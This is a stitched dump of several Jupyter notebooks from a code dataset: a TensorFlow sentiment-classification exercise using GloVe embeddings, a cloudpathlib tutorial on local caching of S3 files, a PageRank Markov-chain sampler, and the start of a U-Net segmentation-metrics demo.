] | null | null | null | TF-in-practice-Coursera/3-NLP/NLP_Course_Week_3_Exercise_Question_exploring_overfitting_in_nlp.ipynb | yuynwa/Coursera | e7e44dc11575e00feaa5c4996c97156988c13f6f | [
"MIT"
] | null | null | null | 118.99287 | 22,440 | 0.795925 | [
[
[
"import json\nimport tensorflow as tf\nimport csv\nimport random\nimport numpy as np\n\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras import regularizers\n\n\nembedding_dim = 100\nmax_length = 16\ntrunc_type='post'\npadding_type='post'\noov_tok = \"<OOV>\"\ntraining_size=160000\ntest_portion=.1\n\n\n",
"_____no_output_____"
],
[
"\n# Note that I cleaned the Stanford dataset to remove LATIN1 encoding to make it easier for Python CSV reader\n# You can do that yourself with:\n# iconv -f LATIN1 -t UTF8 training.1600000.processed.noemoticon.csv -o training_cleaned.csv\n# I then hosted it on my site to make it easier to use in this notebook\n\n!wget --no-check-certificate \\\n https://storage.googleapis.com/laurencemoroney-blog.appspot.com/training_cleaned.csv \\\n -O /tmp/training_cleaned.csv\ncorpus = []\nnum_sentences = 0\n\nwith open(\"/tmp/training_cleaned.csv\") as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n # Your Code here. Create list items where the first item is the text, found in row[5], and the second is the label. Note that the label is a '0' or a '4' in the text. When it's the former, make\n # your label to be 0, otherwise 1. Keep a count of the number of sentences in num_sentences\n list_item=[]\n list_item.append(row[5])\n \n # YOUR CODE HERE\n if row[0] == '0':\n list_item.append(0)\n else:\n list_item.append(1)\n num_sentences = num_sentences + 1\n corpus.append(list_item)\n\n\n",
"--2019-09-14 05:04:09-- https://storage.googleapis.com/laurencemoroney-blog.appspot.com/training_cleaned.csv\nResolving storage.googleapis.com (storage.googleapis.com)... 108.177.97.128, 2404:6800:4008:c01::80\nConnecting to storage.googleapis.com (storage.googleapis.com)|108.177.97.128|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 238942690 (228M) [application/octet-stream]\nSaving to: ‘/tmp/training_cleaned.csv’\n\n/tmp/training_clean 100%[===================>] 227.87M 112MB/s in 2.0s \n\n2019-09-14 05:04:11 (112 MB/s) - ‘/tmp/training_cleaned.csv’ saved [238942690/238942690]\n\n"
],
[
"print(num_sentences)\nprint(len(corpus))\nprint(corpus[1])\n\n# Expected Output:\n# 1600000\n# 1600000\n# [\"is upset that he can't update his Facebook by texting it... and might cry as a result School today also. Blah!\", 0]",
"1600000\n1600000\n[\"is upset that he can't update his Facebook by texting it... and might cry as a result School today also. Blah!\", 0]\n"
],
[
"sentences=[]\nlabels=[]\nrandom.shuffle(corpus)\nfor x in range(training_size):\n sentences.append(corpus[x][0])\n labels.append(corpus[x][1])\n\n\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(sentences)\n\nword_index = tokenizer.word_index\nvocab_size=len(word_index)\n\nsequences = tokenizer.texts_to_sequences(sentences)\npadded = pad_sequences(sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\nsplit = int(test_portion * training_size)\n\ntest_sequences = padded[:split]\ntraining_sequences = padded[split:training_size]\ntest_labels = labels[:split]\ntraining_labels = labels[split:training_size]",
"_____no_output_____"
],
[
"print(vocab_size)\nprint(word_index['i'])\n# Expected Output\n# 138858\n# 1",
"138360\n1\n"
],
[
"# Note this is the 100 dimension version of GloVe from Stanford\n# I unzipped and hosted it on my site to make this notebook easier\n!wget --no-check-certificate \\\n https://storage.googleapis.com/laurencemoroney-blog.appspot.com/glove.6B.100d.txt \\\n -O /tmp/glove.6B.100d.txt\nembeddings_index = {};\nwith open('/tmp/glove.6B.100d.txt') as f:\n for line in f:\n values = line.split();\n word = values[0];\n coefs = np.asarray(values[1:], dtype='float32');\n embeddings_index[word] = coefs;\n\nembeddings_matrix = np.zeros((vocab_size+1, embedding_dim));\nfor word, i in word_index.items():\n embedding_vector = embeddings_index.get(word);\n if embedding_vector is not None:\n embeddings_matrix[i] = embedding_vector;",
"--2019-09-14 05:04:58-- https://storage.googleapis.com/laurencemoroney-blog.appspot.com/glove.6B.100d.txt\nResolving storage.googleapis.com (storage.googleapis.com)... 74.125.23.128, 2404:6800:4008:c01::80\nConnecting to storage.googleapis.com (storage.googleapis.com)|74.125.23.128|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 347116733 (331M) [text/plain]\nSaving to: ‘/tmp/glove.6B.100d.txt’\n\n/tmp/glove.6B.100d. 100%[===================>] 331.04M 86.1MB/s in 4.1s \n\n2019-09-14 05:05:03 (81.7 MB/s) - ‘/tmp/glove.6B.100d.txt’ saved [347116733/347116733]\n\n"
],
[
"print(len(embeddings_matrix))\n# Expected Output\n# 138859",
"138361\n"
],
[
"model = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size+1, embedding_dim, input_length=max_length, weights=[embeddings_matrix], trainable=False),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Conv1D(64, 5, activation='relu'),\n tf.keras.layers.MaxPooling1D(pool_size=4),\n tf.keras.layers.LSTM(64),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\nmodel.compile(\n loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'],\n)\nmodel.summary()\n\nnum_epochs = 50\nhistory = model.fit(training_sequences, training_labels, epochs=num_epochs, validation_data=(test_sequences, test_labels), verbose=2)\n\nprint(\"Training Complete\")\n",
"Model: \"sequential_5\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nembedding_5 (Embedding) (None, 16, 100) 13836100 \n_________________________________________________________________\ndropout_5 (Dropout) (None, 16, 100) 0 \n_________________________________________________________________\nconv1d_5 (Conv1D) (None, 12, 64) 32064 \n_________________________________________________________________\nmax_pooling1d_5 (MaxPooling1 (None, 3, 64) 0 \n_________________________________________________________________\nlstm_5 (LSTM) (None, 64) 33024 \n_________________________________________________________________\ndense_5 (Dense) (None, 1) 65 \n=================================================================\nTotal params: 13,901,253\nTrainable params: 65,153\nNon-trainable params: 13,836,100\n_________________________________________________________________\nTrain on 144000 samples, validate on 16000 samples\nEpoch 1/50\n144000/144000 - 57s - loss: 0.5672 - acc: 0.6996 - val_loss: 0.5330 - val_acc: 0.7258\nEpoch 2/50\n144000/144000 - 56s - loss: 0.5258 - acc: 0.7327 - val_loss: 0.5091 - val_acc: 0.7468\nEpoch 3/50\n144000/144000 - 56s - loss: 0.5085 - acc: 0.7451 - val_loss: 0.5047 - val_acc: 0.7460\nEpoch 4/50\n144000/144000 - 56s - loss: 0.4972 - acc: 0.7523 - val_loss: 0.5089 - val_acc: 0.7479\nEpoch 5/50\n144000/144000 - 56s - loss: 0.4884 - acc: 0.7593 - val_loss: 0.5025 - val_acc: 0.7504\nEpoch 6/50\n144000/144000 - 56s - loss: 0.4818 - acc: 0.7621 - val_loss: 0.4985 - val_acc: 0.7534\nEpoch 7/50\n144000/144000 - 56s - loss: 0.4762 - acc: 0.7672 - val_loss: 0.5078 - val_acc: 0.7459\nEpoch 8/50\n144000/144000 - 56s - loss: 0.4708 - acc: 0.7699 - val_loss: 0.4982 - val_acc: 0.7546\nEpoch 9/50\n144000/144000 - 56s - loss: 0.4672 - acc: 0.7720 - val_loss: 0.4969 - val_acc: 0.7551\nEpoch 10/50\n144000/144000 - 56s - loss: 0.4628 - acc: 0.7748 - val_loss: 0.5002 - val_acc: 0.7543\nEpoch 11/50\n144000/144000 - 56s - loss: 0.4604 - acc: 0.7762 - val_loss: 0.5019 - val_acc: 0.7566\nEpoch 12/50\n144000/144000 - 56s - loss: 0.4575 - acc: 0.7771 - val_loss: 0.5010 - val_acc: 0.7558\nEpoch 13/50\n144000/144000 - 56s - loss: 0.4545 - acc: 0.7791 - val_loss: 0.5020 - val_acc: 0.7574\nEpoch 14/50\n144000/144000 - 56s - loss: 0.4521 - acc: 0.7814 - val_loss: 0.5023 - val_acc: 0.7542\nEpoch 15/50\n144000/144000 - 56s - loss: 0.4505 - acc: 0.7815 - val_loss: 0.5078 - val_acc: 0.7493\nEpoch 16/50\n144000/144000 - 55s - loss: 0.4493 - acc: 0.7836 - val_loss: 0.5000 - val_acc: 0.7551\nEpoch 17/50\n144000/144000 - 55s - loss: 0.4463 - acc: 0.7840 - val_loss: 0.5050 - val_acc: 0.7574\nEpoch 18/50\n144000/144000 - 56s - loss: 0.4461 - acc: 0.7835 - val_loss: 0.5071 - val_acc: 0.7549\nEpoch 19/50\n144000/144000 - 56s - loss: 0.4439 - acc: 0.7857 - val_loss: 0.5079 - val_acc: 0.7542\nEpoch 20/50\n144000/144000 - 56s - loss: 0.4419 - acc: 0.7873 - val_loss: 0.5063 - val_acc: 0.7536\nEpoch 21/50\n144000/144000 - 55s - loss: 0.4405 - acc: 0.7889 - val_loss: 0.5113 - val_acc: 0.7504\nEpoch 22/50\n144000/144000 - 55s - loss: 0.4398 - acc: 0.7894 - val_loss: 0.5113 - val_acc: 0.7545\nEpoch 23/50\n144000/144000 - 56s - loss: 0.4392 - acc: 0.7900 - val_loss: 0.5085 - val_acc: 0.7514\nEpoch 24/50\n144000/144000 - 55s - loss: 0.4371 - acc: 0.7918 - val_loss: 0.5083 - val_acc: 0.7513\nEpoch 25/50\n144000/144000 - 55s - loss: 0.4365 - acc: 0.7910 - val_loss: 0.5084 - val_acc: 0.7504\nEpoch 
26/50\n144000/144000 - 55s - loss: 0.4360 - acc: 0.7919 - val_loss: 0.5101 - val_acc: 0.7524\nEpoch 27/50\n144000/144000 - 55s - loss: 0.4358 - acc: 0.7916 - val_loss: 0.5094 - val_acc: 0.7570\nEpoch 28/50\n144000/144000 - 55s - loss: 0.4342 - acc: 0.7920 - val_loss: 0.5135 - val_acc: 0.7533\nEpoch 29/50\n144000/144000 - 56s - loss: 0.4350 - acc: 0.7916 - val_loss: 0.5116 - val_acc: 0.7515\nEpoch 30/50\n144000/144000 - 55s - loss: 0.4335 - acc: 0.7930 - val_loss: 0.5102 - val_acc: 0.7553\nEpoch 31/50\n144000/144000 - 56s - loss: 0.4334 - acc: 0.7940 - val_loss: 0.5124 - val_acc: 0.7546\nEpoch 32/50\n144000/144000 - 55s - loss: 0.4324 - acc: 0.7944 - val_loss: 0.5144 - val_acc: 0.7539\nEpoch 33/50\n144000/144000 - 55s - loss: 0.4311 - acc: 0.7952 - val_loss: 0.5218 - val_acc: 0.7536\nEpoch 34/50\n144000/144000 - 56s - loss: 0.4312 - acc: 0.7941 - val_loss: 0.5156 - val_acc: 0.7541\nEpoch 35/50\n144000/144000 - 55s - loss: 0.4314 - acc: 0.7940 - val_loss: 0.5149 - val_acc: 0.7543\nEpoch 36/50\n144000/144000 - 55s - loss: 0.4306 - acc: 0.7943 - val_loss: 0.5176 - val_acc: 0.7477\nEpoch 37/50\n144000/144000 - 55s - loss: 0.4307 - acc: 0.7951 - val_loss: 0.5150 - val_acc: 0.7526\nEpoch 38/50\n144000/144000 - 55s - loss: 0.4293 - acc: 0.7967 - val_loss: 0.5179 - val_acc: 0.7553\nEpoch 39/50\n144000/144000 - 55s - loss: 0.4281 - acc: 0.7966 - val_loss: 0.5171 - val_acc: 0.7516\nEpoch 40/50\n144000/144000 - 56s - loss: 0.4294 - acc: 0.7952 - val_loss: 0.5210 - val_acc: 0.7493\nEpoch 41/50\n144000/144000 - 55s - loss: 0.4294 - acc: 0.7959 - val_loss: 0.5176 - val_acc: 0.7514\nEpoch 42/50\n144000/144000 - 55s - loss: 0.4279 - acc: 0.7965 - val_loss: 0.5158 - val_acc: 0.7531\nEpoch 43/50\n144000/144000 - 55s - loss: 0.4281 - acc: 0.7965 - val_loss: 0.5169 - val_acc: 0.7525\nEpoch 44/50\n144000/144000 - 55s - loss: 0.4270 - acc: 0.7974 - val_loss: 0.5177 - val_acc: 0.7531\nEpoch 45/50\n144000/144000 - 55s - loss: 0.4275 - acc: 0.7969 - val_loss: 0.5132 - val_acc: 0.7533\nEpoch 46/50\n144000/144000 - 56s - loss: 0.4281 - acc: 0.7968 - val_loss: 0.5165 - val_acc: 0.7524\nEpoch 47/50\n144000/144000 - 55s - loss: 0.4273 - acc: 0.7965 - val_loss: 0.5165 - val_acc: 0.7517\nEpoch 48/50\n144000/144000 - 55s - loss: 0.4269 - acc: 0.7964 - val_loss: 0.5227 - val_acc: 0.7495\nEpoch 49/50\n144000/144000 - 55s - loss: 0.4257 - acc: 0.7968 - val_loss: 0.5141 - val_acc: 0.7554\nEpoch 50/50\n144000/144000 - 56s - loss: 0.4263 - acc: 0.7979 - val_loss: 0.5182 - val_acc: 0.7521\nTraining Complete\n"
],
[
"import matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\n\n#-----------------------------------------------------------\n# Retrieve a list of list results on training and test data\n# sets for each training epoch\n#-----------------------------------------------------------\nacc=history.history['acc']\nval_acc=history.history['val_acc']\nloss=history.history['loss']\nval_loss=history.history['val_loss']\n\nepochs=range(len(acc)) # Get number of epochs\n\n#------------------------------------------------\n# Plot training and validation accuracy per epoch\n#------------------------------------------------\nplt.plot(epochs, acc, 'r')\nplt.plot(epochs, val_acc, 'b')\nplt.title('Training and validation accuracy')\nplt.xlabel(\"Epochs\")\nplt.ylabel(\"Accuracy\")\nplt.legend([\"Accuracy\", \"Validation Accuracy\"])\n\nplt.figure()\n\n#------------------------------------------------\n# Plot training and validation loss per epoch\n#------------------------------------------------\nplt.plot(epochs, loss, 'r')\nplt.plot(epochs, val_loss, 'b')\nplt.title('Training and validation loss')\nplt.xlabel(\"Epochs\")\nplt.ylabel(\"Loss\")\nplt.legend([\"Loss\", \"Validation Loss\"])\n\nplt.figure()\n\n\n# Expected Output\n# A chart where the validation loss does not increase sharply!",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0243b90ce747efe4f166e1ae5daa034158b5c1 | 447,963 | ipynb | Jupyter Notebook | docs/docs/caching.ipynb | ElucidataInc/cloudpathlib | 9c11c6af2b0ac713ddcd950123d1db3b17515efa | [
"MIT"
] | 128 | 2020-10-07T00:18:55.000Z | 2022-03-31T15:37:12.000Z | docs/docs/caching.ipynb | ElucidataInc/cloudpathlib | 9c11c6af2b0ac713ddcd950123d1db3b17515efa | [
"MIT"
] | 138 | 2020-10-06T23:46:35.000Z | 2022-03-30T23:04:09.000Z | docs/docs/caching.ipynb | ElucidataInc/cloudpathlib | 9c11c6af2b0ac713ddcd950123d1db3b17515efa | [
"MIT"
] | 20 | 2020-10-15T13:35:27.000Z | 2022-03-23T07:58:58.000Z | 1,025.086957 | 144,988 | 0.955981 | [
[
[
"# Caching\n\nInteracting with files on a cloud provider can mean a lot of waiting on files downloading and uploading. `cloudpathlib` provides seamless on-demand caching of cloud content that can be persistent across processes and sessions to make sure you only download or upload when you need to.",
"_____no_output_____"
],
[
"## Are we synced?\n\nBefore `cloudpathlib`, we spent a lot of time syncing our remote and local files. There was no great solution. For example, I just need one file, but I only have a script that downloads the entire 800GB bucket (or worse, you can't remember exactly _which_ files you need 🤮). Or _even worse_, you have all the files synced to your local machine, but you suspect that some are are up-to-date and some are stale. More often that I'd like to admit, the simplest answer was to blast the whole data directory and download all over again. Bandwidth doesn't grow on trees!\n\n\n## Cache me if you can\n\nPart of what makes `cloudpathlib` so useful is that it takes care of all of that, leaving your precious mental resources free to do other things! It maintains a local cache and only downloads a file if the local version and remote versions are out of sync. Every time you read or write a file, `cloudpathlib` goes through these steps:\n\n- Does the file exist in the cache already?\n- If no, download it to the cache.\n- If yes, does the cached version have the same modtime as the cloud version?\n- If it is older, re-download the file and replace the old cached version with the updated version from the cloud.\n- If the local one is newer, something is up! We don't want to overwrite your local changes with the version from the cloud. If we see this scenario, we'll raise an error and offer some options to resolve the versions.\n\n## Supporting reading and writing\n\nThe cache logic also support writing to cloud files seamlessly in addition to reading. We do this by tracking when a `CloudPath` is opened and on the close of that file, we will upload the new version to the cloud if it has changed.\n\n**Warning** we don't upload files that weren't opened for write by `cloudpathlib`. For example, if you edit a file in the cache manually in a text edior, `cloudpathlib` won't know to update that file on the cloud. If you want to write to a file in the cloud, you should use the `open` or `write` methods, for example:\n\n```python\nwith my_cloud_path.open(\"w\") as f:\n f.write(\"My new text!\")\n```\n\nThis will download the file, write to the text to the local version in the cache, and when that file is closed we know to upload the changed version to the cloud.\n\nAs an example, let's look at using the [Low Altitude Disaster Imagery](https://registry.opendata.aws/ladi/) open dataset on S3. We'll view one images available of a flooding incident available on S3.",
"_____no_output_____"
]
],
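 [
  [
   "The sync steps above can be summarized as a tiny decision function. This is only an illustrative sketch of the logic described in this document, not the actual `cloudpathlib` implementation:\n\n```python\n# Illustrative sketch only: compare modification times the way the steps above describe.\ndef needs_download(cloud_mtime, cached_mtime):\n    if cached_mtime is None:        # not in the cache yet\n        return True\n    if cached_mtime < cloud_mtime:  # cached copy is stale\n        return True\n    if cached_mtime > cloud_mtime:  # local changes would be lost; an error is raised instead\n        raise RuntimeError('local cache is newer than the cloud version')\n    return False                    # already in sync\n```",
   "_____no_output_____"
  ]
 ],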
[
[
"from cloudpathlib import CloudPath\nfrom itertools import islice\n\nladi = CloudPath(\"s3://ladi/Images/FEMA_CAP/2020/70349\")\n\n# list first 5 images for this incident\nfor p in islice(ladi.iterdir(), 5):\n print(p)",
"s3://ladi/Images/FEMA_CAP/2020/70349/DSC_0001_5a63d42e-27c6-448a-84f1-bfc632125b8e.jpg\ns3://ladi/Images/FEMA_CAP/2020/70349/DSC_0002_a89f1b79-786f-4dac-9dcc-609fb1a977b1.jpg\ns3://ladi/Images/FEMA_CAP/2020/70349/DSC_0003_02c30af6-911e-4e01-8c24-7644da2b8672.jpg\ns3://ladi/Images/FEMA_CAP/2020/70349/DSC_0004_d37c02b9-01a8-4672-b06f-2690d70e5e6b.jpg\ns3://ladi/Images/FEMA_CAP/2020/70349/DSC_0005_d05609ce-1c45-4de3-b0f1-401c2bb3412c.jpg\n"
]
],
[
[
"Just because we saw these images are available, it doesn't mean we have downloaded any of this data yet.",
"_____no_output_____"
]
],
[
[
"# Nothing in the cache yet\n!tree {ladi.fspath}",
"/var/folders/8g/v8lwvfhj6_l6ct_zd_rs84mw0000gn/T/tmpqfelhthi/ladi/Images/FEMA_CAP/2020/70349 [error opening dir]\r\n\r\n0 directories, 0 files\r\n"
]
],
[
[
"Now let's look at just the first image from this dataset.",
"_____no_output_____"
]
],
[
[
"flood_image = ladi / \"DSC_0001_5a63d42e-27c6-448a-84f1-bfc632125b8e.jpg\"\nflood_image.exists()",
"_____no_output_____"
],
[
"# Still nothing in the cache\n!tree {ladi.fspath}",
"/var/folders/8g/v8lwvfhj6_l6ct_zd_rs84mw0000gn/T/tmpqfelhthi/ladi/Images/FEMA_CAP/2020/70349 [error opening dir]\r\n\r\n0 directories, 0 files\r\n"
]
],
[
[
"Even though we refer to a specific file and make sure it exists in the cloud, we can still do all of that work without actually downloading the file.\n\nIn order to read the file, we do have to download the data. Let's actually display the image:",
"_____no_output_____"
]
],
[
[
"%%time\n%matplotlib inline\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nwith flood_image.open(\"rb\") as f:\n i = Image.open(f)\n plt.imshow(i)\n",
"CPU times: user 1.3 s, sys: 435 ms, total: 1.74 s\nWall time: 2.27 s\n"
],
[
"# Downloaded image file in the cache\n!tree {ladi.fspath}",
"\u001b[01;34m/var/folders/8g/v8lwvfhj6_l6ct_zd_rs84mw0000gn/T/tmpqfelhthi/ladi/Images/FEMA_CAP/2020/70349\u001b[00m\r\n└── \u001b[01;35mDSC_0001_5a63d42e-27c6-448a-84f1-bfc632125b8e.jpg\u001b[00m\r\n\r\n0 directories, 1 file\r\n"
]
],
[
[
"Just be using `open`, we've downloaded the file in the background to the cache. Now that it is local, we won't redownload that file unless it changes on the server. We can confirm that by checking if the file is faster to read a second time.",
"_____no_output_____"
]
],
[
[
"%%time\nwith flood_image.open(\"rb\") as f:\n i = Image.open(f)\n plt.imshow(i)",
"CPU times: user 351 ms, sys: 36.7 ms, total: 388 ms\nWall time: 1.08 s\n"
]
],
[
[
"Notice that the second display is much faster since we use the cached version!",
"_____no_output_____"
],
[
"## Keeping the cache around\n\nBy default, the cache uses [`tempfile`](https://docs.python.org/3/library/tempfile.html) this means at some point either Python or your operating system will remove whatever files you have cached. This is helpful in that it means the downloaded files get cleaned up regularly and don't necessarily clutter up your local hard drive.\n\nHowever, sometimes I don't want to have to re-download files I know won't change. For example, in the LADI dataset, I may want to use the images in a Jupyter notebook and every time I restart the notebook I want to always have the downloaded files. I don't want to re-download since I know the LADI images won't be changing on S3.\n\nWe can do this just by using a `Client` that does all the downloading/uploading to a specfic folder on our local machine.",
"_____no_output_____"
]
],
[
[
"from cloudpathlib import S3Client\n\n# explicitly instantiate a client that always uses the local cache\nclient = S3Client(local_cache_dir=\"data\")\n\nladi = client.CloudPath(\"s3://ladi/Images/FEMA_CAP/2020/70349\")",
"_____no_output_____"
],
[
"# Again, nothing in the cache yet, but we see it is all in the \"data\" folder\n!tree {ladi.fspath}",
"data/ladi/Images/FEMA_CAP/2020/70349 [error opening dir]\r\n\r\n0 directories, 0 files\r\n"
]
],
[
[
"Now let's look at just the first image from this dataset. Note that paths created by using the `ladi` root (e.g., by using the `/` operator below or calls like `iterdir` and `glob`) will inherit the same `Client` instance, and therefore the same `local_cache_dir` without our having to do extra work.",
"_____no_output_____"
]
],
[
[
"flood_image = ladi / \"DSC_0002_a89f1b79-786f-4dac-9dcc-609fb1a977b1.jpg\"\n\nwith flood_image.open(\"rb\") as f:\n i = Image.open(f)\n plt.imshow(i)",
"_____no_output_____"
],
[
"# Now\n!tree {ladi.fspath}",
"\u001b[01;34mdata/ladi/Images/FEMA_CAP/2020/70349\u001b[00m\r\n└── \u001b[01;35mDSC_0002_a89f1b79-786f-4dac-9dcc-609fb1a977b1.jpg\u001b[00m\r\n\r\n0 directories, 1 file\r\n"
],
[
"# let's explicitly cleanup this directory, since it is not handled for us\n!rm -rf data",
"_____no_output_____"
]
],
[
[
"## Accessing the cached version directly (read-only)\n\nMany Python libraries don't properly handle `PathLike` objects. These libraries often only expect a `str` to be passed when working with files or, even worse, they will call `str(p)` on a Path that is passed before using it.\n\nTo use `cloudpathlib` with these libraries, you can pass `.fspath` which will provide the path to the cached version of the file as a string. \n\n**Warning:** Using the `.fspath` property will download the file from the cloud if it does not exist yet in the cache.\n\n**Warning:** Since we are no longer in control of opening/closing the file, we cannot upload any changes when the file is closed. Therefore, you should treat any code where you use `fspath` as _read only_. Writes directly to `fspath` will not be uplaoded to the cloud.\n",
"_____no_output_____"
],
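  [
   "As a minimal sketch (assuming the `flood_image` path from earlier in this notebook; `matplotlib.image.imread` is just one example of a function that expects a plain string path):\n\n```python\nimport matplotlib.image as mpimg\n\n# .fspath downloads to the cache if needed and returns the local path as a str.\n# Treat the result as read-only: edits to the cached file are not uploaded.\nimg = mpimg.imread(flood_image.fspath)\nprint(img.shape)\n```",
   "_____no_output_____"
  ],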
[
"## Handling conflicts\n\nWe try to be conservative in terms of not losing data—especially data stored on the cloud, which is likely to be the canonical version. Given this, we will raise exceptions in two scenarios:\n\n`OverwriteNewerLocalError`\nThis exception is raised if we are asked to download a file, but our local version in the cache is newer. This likely means that the cached version has been updated, but not pushed to the cloud. To work around this you could remove the cache version explicitly if you _know_ you don't need that data. If you did write changes you need, make sure your code uses the `cloudpathlib` versions of the `open`, `write_text`, or `write_bytes` methods, which will upload your changes to the cloud automatically.\n\nThe `CloudPath.open` method supports a `force_overwrite_from_cloud` kwarg to force overwriting your local version.\n\n`OverwriteNewerCloudError`\nThis exception is raised if we are asked to upload a file, but the one on the cloud is newer than our local version. This likely means that a separate process has updated the cloud version, and we don't want to overwrite and lose that new data in the cloud.\n\nThe `CloudPath.open` method supports a `force_overwrite_to_cloud` kwarg to force overwriting the cloud version.\n\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb02441b1ba4ab8f2a14be739fc33f2e31108f9b | 8,069 | ipynb | Jupyter Notebook | pagerank/.ipynb_checkpoints/pagerank-checkpoint.ipynb | philip-le/AI_projects | c1ea8bc68a7e2a81a93a645dc167710219425ac0 | [
"MIT"
] | null | null | null | pagerank/.ipynb_checkpoints/pagerank-checkpoint.ipynb | philip-le/AI_projects | c1ea8bc68a7e2a81a93a645dc167710219425ac0 | [
"MIT"
] | null | null | null | pagerank/.ipynb_checkpoints/pagerank-checkpoint.ipynb | philip-le/AI_projects | c1ea8bc68a7e2a81a93a645dc167710219425ac0 | [
"MIT"
] | null | null | null | 26.198052 | 108 | 0.498451 | [
[
[
"import os\nimport random\nimport re\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn; seaborn.set_style('whitegrid')\nfrom collections import Counter\n\nfrom pomegranate import *\n\ncorpus_index = 2\nDAMPING = 0.85\nSAMPLES = 10000",
"_____no_output_____"
],
[
"os.getcwd()",
"_____no_output_____"
],
[
"\ndef crawl(directory):\n \"\"\"\n Parse a directory of HTML pages and check for links to other pages.\n Return a dictionary where each key is a page, and values are\n a list of all other pages in the corpus that are linked to by the page.\n \"\"\"\n pages = dict()\n\n # Extract all links from HTML files\n for filename in os.listdir(directory):\n if not filename.endswith(\".html\"):\n continue\n with open(os.path.join(directory, filename)) as f:\n contents = f.read()\n links = re.findall(r\"<a\\s+(?:[^>]*?)href=\\\"([^\\\"]*)\\\"\", contents)\n pages[filename] = set(links) - {filename}\n\n # Only include links to other pages in the corpus\n for filename in pages:\n pages[filename] = set(\n link for link in pages[filename]\n if link in pages\n )\n\n return pages\n\n",
"_____no_output_____"
],
[
"corpus = crawl(f'corpus{corpus_index}')\ncorpus",
"_____no_output_____"
],
[
"# define the starting probability for which page to stay\nstart = DiscreteDistribution({\n page: 1/len(corpus) for page in corpus\n})\n\nstart",
"_____no_output_____"
],
[
"# states = {page: State(DiscreteDistribution({'yes': 0.5, 'no': 0.5}), name=page) \n# for page in corpus}\n# states",
"_____no_output_____"
],
[
"# Define transition model\n\ntransition_list = []\nlc = len(corpus)\n\nfor page in corpus:\n if len(corpus[page]) == 0:\n for next_page in corpus:\n transition_list.append([page, next_page, 1/lc])\n else:\n \n for next_page in corpus:\n if next_page in corpus[page]:\n transition_list.append([page, next_page, DAMPING/len(corpus[page])+(1-DAMPING)/lc])\n else:\n transition_list.append([page, next_page, (1-DAMPING)/lc])\n\ntransitions = ConditionalProbabilityTable(transition_list, [start])\n",
"_____no_output_____"
],
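  [
   "# The transition probabilities built in the previous cell follow the standard\n# PageRank update with damping factor d = DAMPING over N = len(corpus) pages:\n#\n#   P(next | page) = d / len(links(page)) + (1 - d) / N   if page links to next\n#   P(next | page) = (1 - d) / N                          otherwise\n#   P(next | page) = 1 / N                                if page has no outgoing links",
   "_____no_output_____"
  ],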
[
"# Create Markov chain\nmodel = MarkovChain([start, transitions])",
"_____no_output_____"
],
[
"# Sample 100000 states from chain\nresult = [(x[0], x[1]/SAMPLES) for x in Counter(model.sample(SAMPLES)).most_common()]\nresult",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb02476ff796e8e1edbdf4ce2e981dda99c4506b | 120,871 | ipynb | Jupyter Notebook | notebooks/unet_segmentation_metrics.ipynb | KristinaUlicna/unet_segmentation_metrics | ca7326bf8af6352a54ba7d684af7518da060f1a0 | [
"MIT"
] | 3 | 2020-08-18T13:37:11.000Z | 2021-04-26T18:50:55.000Z | notebooks/unet_segmentation_metrics.ipynb | KristinaUlicna/unet_segmentation_metrics | ca7326bf8af6352a54ba7d684af7518da060f1a0 | [
"MIT"
] | null | null | null | notebooks/unet_segmentation_metrics.ipynb | KristinaUlicna/unet_segmentation_metrics | ca7326bf8af6352a54ba7d684af7518da060f1a0 | [
"MIT"
] | null | null | null | 371.910769 | 83,972 | 0.939216 | [
[
[
"## Simple demonstration of calculating segmentation metrics",
"_____no_output_____"
]
],
[
[
"import os\nimport sys\nsys.path.append('..')\nimport umetrics\n\nimport numpy as np\nfrom skimage.io import imread",
"_____no_output_____"
],
[
"# load a ground truth - prediction image pair\nn = 1\np = '/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12'\ntrue = imread(os.path.join(p, 'labels_compressed', f'l_{n}.tif'))\npred = imread(os.path.join(p, 'segmented_2019-11-27', f's_{n}.tif'))",
"_____no_output_____"
],
[
"result = umetrics.calculate(true, pred)",
"_____no_output_____"
]
],
[
[
"## visualize the metrics",
"_____no_output_____"
]
],
[
[
"# uncomment for interactive\n# %matplotlib qt",
"_____no_output_____"
],
[
"result.plot()",
"_____no_output_____"
],
[
"print(result.results)",
"============================\n Segmentation Metrics (n=1)\n============================\nn_true_labels: 110\nn_pred_labels: 103\nn_true_positives: 97\nn_false_positives: 6\nn_false_negatives: 8\nIoU: 0.838\nJaccard: 0.874\npixel_identity: 0.991\nlocalization_error: 2.635\n\n"
]
],
[
[
"## plot some stats",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt",
"_____no_output_____"
],
[
